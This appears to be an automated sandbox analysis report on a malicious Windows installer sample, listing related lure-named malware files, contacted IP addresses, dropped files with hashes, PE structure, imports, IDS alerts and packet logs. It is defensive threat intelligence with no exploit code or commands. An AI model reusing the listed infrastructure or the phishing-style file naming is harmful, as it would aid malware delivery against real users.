                                                                                  winlog.exeGet hashmaliciousBrowse
                                                                                  • 23.227.38.74
                                                                                  products order pdf .exeGet hashmaliciousBrowse
                                                                                  • 23.227.38.74
                                                                                  REVISED ORDER.exeGet hashmaliciousBrowse
                                                                                  • 23.227.38.74
                                                                                  e9777bb4_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                  • 23.227.38.74
                                                                                  NEW ORDER.exeGet hashmaliciousBrowse
                                                                                  • 23.227.38.74

                                                                                  ASN

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  NAMECHEAP-NETUSFirst_stely_shit_open_please.exeGet hashmaliciousBrowse
                                                                                  • 199.188.200.202
                                                                                  59c9f346_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                  • 198.54.114.131
                                                                                  c527325d_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                  • 198.54.114.131
                                                                                  CRPR7mRha6.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  W9YDH79i8G.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  Ko4zQgTBHv.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                                  • 198.54.126.165
                                                                                  wed.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  ORDER CONFIRMATION.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  SecuriteInfo.com.Trojan.Packed2.43091.10004.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  6e5c05e1_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  RFQ Plasma cutting machine.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                  • 198.54.117.216
                                                                                  main_setup_x86x64.exeGet hashmaliciousBrowse
                                                                                  • 162.255.119.164
                                                                                  00098765123POIIU.exeGet hashmaliciousBrowse
                                                                                  • 199.192.23.253
                                                                                  e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                  • 185.61.154.27
                                                                                  2021_May_Quotation_pdf.exeGet hashmaliciousBrowse
                                                                                  • 198.54.115.133
                                                                                  337840b9_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                                                                                  • 198.54.117.212
                                                                                  Updated Order list -804333.exeGet hashmaliciousBrowse
                                                                                  • 198.54.115.56
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                  • 156.252.96.189
                                                                                  New RFQ.exeGet hashmaliciousBrowse
                                                                                  • 154.92.64.253
                                                                                  PP,Sporda.exeGet hashmaliciousBrowse
                                                                                  • 160.124.137.188
                                                                                  Purchase Inquiry 11.05.2021.exeGet hashmaliciousBrowse
                                                                                  • 154.213.202.60
                                                                                  WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                                  • 154.215.87.72
                                                                                  PO09641.exeGet hashmaliciousBrowse
                                                                                  • 154.93.81.33
                                                                                  Purchase Order #330716o.exeGet hashmaliciousBrowse
                                                                                  • 154.88.205.33
                                                                                  original documents.exeGet hashmaliciousBrowse
                                                                                  • 154.220.41.208
                                                                                  SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                                                  • 154.220.41.208
                                                                                  c8080fbf_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                                  • 154.86.42.252
                                                                                  REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                  • 154.220.41.208
                                                                                  O1E623TjjW.exeGet hashmaliciousBrowse
                                                                                  • 43.230.169.157
                                                                                  SWIT BANK PAPER PAYMENT.exeGet hashmaliciousBrowse
                                                                                  • 154.213.207.4
                                                                                  PO_29_00412.exeGet hashmaliciousBrowse
                                                                                  • 154.216.244.232
                                                                                  z5Wqivscwd.exeGet hashmaliciousBrowse
                                                                                  • 154.88.201.82
                                                                                  8480fe6d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                  • 154.88.208.8
                                                                                  S4gONKzrzB.exeGet hashmaliciousBrowse
                                                                                  • 154.216.85.54
                                                                                  PO17439.exeGet hashmaliciousBrowse
                                                                                  • 103.234.52.224
                                                                                  gunzipped.exeGet hashmaliciousBrowse
                                                                                  • 103.234.52.32
                                                                                  FORM C.xlsxGet hashmaliciousBrowse
                                                                                  • 160.124.11.194

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\2813qk5gv9ujz
                                                                                  Process:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):164352
                                                                                  Entropy (8bit):7.998901832297446
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:4r3BCJ0FMjwgA0JMTxvUQEhWwlIeg7Gt7zukLKqe+vysSr8qato3:4dCJnY0y9sQEA97G9z3Kqe3r87W3
                                                                                  MD5:7DC8AC6B34FFA64B971758694AADCB96
                                                                                  SHA1:299F920FA6C052644823D3AB536775DF928EAF61
                                                                                  SHA-256:8353AECFB2593B6AD57D8C7E7DB4B9B58AC0C270C8E84855DF7A2ED1BCF0D825
                                                                                  SHA-512:4A1A77B9A533A29F8DC92C5DDDF1D2B6E06142B79894AC046809ADF2E596FD71149FD4FDF82EC0B2ADA875948419FF94A57B7C791BB8F3A7E13A3693EBE1A91D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ].#.CD.....S....P.~..q.Co.....*.J.[.Kv...L.&.;../.[O..j.l..'............I.....{.3UPH.^....[_....W*x....yY.5'.4\..k6..Z.L+........s..f......Y:...>.....e..]..q.>......J...O}...r..``..].>.a_.g=.y$...........P1.....[.....O.S.%<...$....g..w.U...YT..8.v.x..+.).#.|x...> ...e+.."_8..I.......o..Y...t..[...K...B...S...C.8G.G......V.|X...@s5.x....To..X..a...iLZ.X...".....DC.X../.."..K...V.z...*.HO..|$.R..o..I..!..R.a+..Y|r}A.B.[e.";8@.q..h4.'.".$..Q.p#...'&..'.D...\......A..."...I..E>..).=.....`').A\x.....<..5+.IP.q..r.<.]/.aq......gM.,.0.%....Q...X.@.}qX.T...o..\.E....2p..~...q6`r...8OV.......T........z..FW.5.I.3Y ....4.:-y..$.#.B.....ST....?!.................v.....B../...2-M../...T....|W.@..2..ym.JV.C..q)h.=_,.f.........a..@...x....O......W:..........).....I.....Ei-.r%^...^.......m.....{.e.N..A...,........B.n.u..#2.........)....o..t.....o...l.]....vLhc..F.%(Jx.iw_...0.d3.^./.9J....N...8.+E..Z`z..g\..7.0.Qq....h.......{......B.:@..,.>..e....uV
                                                                                  C:\Users\user\AppData\Local\Temp\fmkr8rw7aiu
                                                                                  Process:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6661
                                                                                  Entropy (8bit):7.892632251148882
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:3fypqb9FA5bh1/B+0/TAGzniLTz/mMBQHd:36qbAbh1J+TYiLej
                                                                                  MD5:9268E0879F7214B79FDE4DA628A11B0A
                                                                                  SHA1:94B741267433C27BC46640A56CEF8BE3810E6F0F
                                                                                  SHA-256:FFEDC245B88C6FF98AB9EE1F71DA75BBD4B1944BB60F114D42C383DD9942647B
                                                                                  SHA-512:C8DDFAD01D14FA1C68ADB4CAAD3E8E456EBCBEC1DB9E3067E3E9252B1C5E7FF1CF2877D58B11EC922767BD214480C218544D94C12D2E908649998B357A78A407
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ....U.+W..C..OW..^.W?....w?.L.O..Q(R.A...?...w..:.....6DJL...L.....^*,*.}....pY[y................z|j...............@....#..1fP....3M1!F@....C3A1V.....cd1a......sbaa..Q...c..q..c:<*.9q...U........g)+I.....z|z.......Y......{ik......$.......... C.H$!.2U.h6.$ C.|$\R2e.L65D`sApd.2b.O..nDp.A...rb.O.f..p.Q.O........:<:.......JLY.......iki......Z\z....6................!FP....30.1V@/...#.Q1fPA...3`1a..3...cAq..E...c`qa..w..:0.....,JL.9...4e:;)....:JKZ.4.y|z.s........yZ[yr*.|j....P.!}.!.r....C.@"...l.!....CAH...D.....O........r...r.BU.....>......9;t.[..+..#.@........,.^#..Z\..y{i......_q5~{y.......".qE....B....#[.R.. ..D.v.i#+k..J.Q+.0.+.}.........s.....@.{...{.=;9../,*,...I.,:.S..)+I..Z\Z.R~.......X|!..'.f..{...H.............E..E..M1..U...../.._.e...:J..JP..Q........_..?......t.;:<....KIz........t..$.NIK...{z|z..?...;WZ\..{.{..ik.....;..B......@....R{"......B........X.....;.`..c........'...c....P.k...G,J..a{...9..;)+...A#SNY[.:..8...V..h....<.
                                                                                  C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll
                                                                                  Process:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):3.5950542702890798
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:Ss8QuwulW+QfPqgYyd0jPY703PCTYDb9dlITnMLNM:hmZzQ3iyog7ncDb9dEMLS
                                                                                  MD5:FEDB20F0FFDF6119BCE0B7430B2CBED1
                                                                                  SHA1:BF9DAB3E49CF209F8D338B7600451BB9B8F5464C
                                                                                  SHA-256:B24D4C68E856B6417FC51285E654AB86A4A0C92ECC6F639C71B6AC6DD7EDF61D
                                                                                  SHA-512:6FB2DAADC1650C788E00CDBAF32A97E03A7F4E485160D4A6AECBAA91C52CA595C2E586A866DF0839C0DE2DC89D0D07F0CAA7D94578391AC668FA91FAA872B4F6
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 59%
                                                                                  Reputation:low
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#xt.g..Ig..Ig..Ig..Iy..I.n.Ih..I@..If..I@..If..I@..If..IRichg..I........................PE..L...a..`...........!......................... ...............................@............@..........................$..M.... ...............................0..H.................................................... ...............................text...T........................... ..`.rdata....... ......................@..@.reloc..R....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):6.821586500284818
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:1cec9342_by_Libranalysis.exe
                                                                                  File size:418969
                                                                                  MD5:1cec9342ac2c1f91201df672382672f2
                                                                                  SHA1:968ab56e042035a593279775308298cfdcdc0af7
                                                                                  SHA256:a1783d0a9f787d819b960b55c8ebfb227459bcb7daab55996720e8279751736f
                                                                                  SHA512:0aa688d114520cba9fa4559273dc65cf6142d1056e115da4552bb9ca09a866e838a1c58a7c1d916dd5be565b613211fbb21c12f92a48b202c7638863b9b2eb6c
                                                                                  SSDEEP:6144:59X0G4b5mFCQcGNYpmUIfvlQd+WSdCJnY0y9sQEA97G9z3Kqe3r87WQ:/0X5mFvcyYQhfvpW+Z197G9Kz3r89
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                                                  File Icon

                                                                                  Icon Hash:2c5c9a72e286e871

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x403348
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 00000184h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  xor ebx, ebx
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+18h], ebx
                                                                                  mov dword ptr [esp+10h], 0040A198h
                                                                                  mov dword ptr [esp+20h], ebx
                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                  call dword ptr [004080B8h]
                                                                                  call dword ptr [004080BCh]
                                                                                  and eax, BFFFFFFFh
                                                                                  cmp ax, 00000006h
                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                  je 00007F83A4CB5933h
                                                                                  push ebx
                                                                                  call 00007F83A4CB8A96h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5929h
                                                                                  push 00000C00h
                                                                                  call eax
                                                                                  mov esi, 004082A0h
                                                                                  push esi
                                                                                  call 00007F83A4CB8A12h
                                                                                  push esi
                                                                                  call dword ptr [004080CCh]
                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                  cmp byte ptr [esi], bl
                                                                                  jne 00007F83A4CB590Dh
                                                                                  push 0000000Bh
                                                                                  call 00007F83A4CB8A6Ah
                                                                                  push 00000009h
                                                                                  call 00007F83A4CB8A63h
                                                                                  push 00000007h
                                                                                  mov dword ptr [0042F424h], eax
                                                                                  call 00007F83A4CB8A57h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5931h
                                                                                  push 0000001Eh
                                                                                  call eax
                                                                                  test eax, eax
                                                                                  je 00007F83A4CB5929h
                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                  push ebp
                                                                                  call dword ptr [00408038h]
                                                                                  push ebx
                                                                                  call dword ptr [00408288h]
                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                  push ebx
                                                                                  lea eax, dword ptr [esp+38h]
                                                                                  push 00000160h
                                                                                  push eax
                                                                                  push ebx
                                                                                  push 00429850h
                                                                                  call dword ptr [0040816Ch]
                                                                                  push 0040A188h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x33b28.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x380000x33b280x33c00False0.497480751812data5.28997877298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x383100x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                  RT_ICON0x48b380xba0dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                  RT_ICON0x545480x94a8dataEnglishUnited States
                                                                                  RT_ICON0x5d9f00x5488dataEnglishUnited States
                                                                                  RT_ICON0x62e780x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                  RT_ICON0x670a00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                  RT_ICON0x696480x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                  RT_ICON0x6a6f00x988dataEnglishUnited States
                                                                                  RT_ICON0x6b0780x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                  RT_DIALOG0x6b4e00x100dataEnglishUnited States
                                                                                  RT_DIALOG0x6b5e00x11cdataEnglishUnited States
                                                                                  RT_DIALOG0x6b7000x60dataEnglishUnited States
                                                                                  RT_GROUP_ICON0x6b7600x84dataEnglishUnited States
                                                                                  RT_MANIFEST0x6b7e80x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                  Imports

                                                                                  DLLImport
                                                                                  ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                  SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                  ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                  USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  05/12/21-20:03:21.436414TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.4
                                                                                  05/12/21-20:03:32.193681TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                                  05/12/21-20:03:48.182682TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.4
                                                                                  05/12/21-20:04:04.026160TCP1201ATTACK-RESPONSES 403 Forbidden804976823.227.38.74192.168.2.4
                                                                                  05/12/21-20:04:09.293071TCP1201ATTACK-RESPONSES 403 Forbidden804977134.102.136.180192.168.2.4
                                                                                  05/12/21-20:04:31.157010TCP1201ATTACK-RESPONSES 403 Forbidden804977534.102.136.180192.168.2.4

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 12, 2021 20:03:15.571806908 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:15.774904966 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:15.777678967 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:15.981957912 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:15.982130051 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:16.184225082 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:16.190001965 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:16.190017939 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:16.190237999 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:16.190298080 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:16.392328024 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:21.257399082 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.298505068 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.298692942 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.298877954 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.339843988 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.436414003 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.436446905 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.436570883 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.436635971 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.477725983 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:26.511318922 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.704844952 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.704986095 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.705135107 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.905880928 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905924082 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905945063 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905966997 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905987978 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906013012 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906034946 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906050920 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906058073 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906074047 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906171083 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906203985 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906291008 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:27.099024057 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:32.014677048 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.055665970 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.055772066 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.055988073 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.098042965 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193681002 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193705082 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193893909 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.193919897 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.236896038 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:37.295784950 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.372031927 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.372140884 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.372333050 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.449304104 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449553967 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449605942 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449742079 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.449825048 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.526467085 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:42.629906893 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.767245054 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.767443895 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.767637014 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.905056000 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905261993 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905289888 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905524969 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.905595064 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:43.044230938 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:48.001588106 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.045504093 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.045645952 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.045959949 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.089550972 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.182682037 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.182719946 CEST804976634.102.136.180192.168.2.4
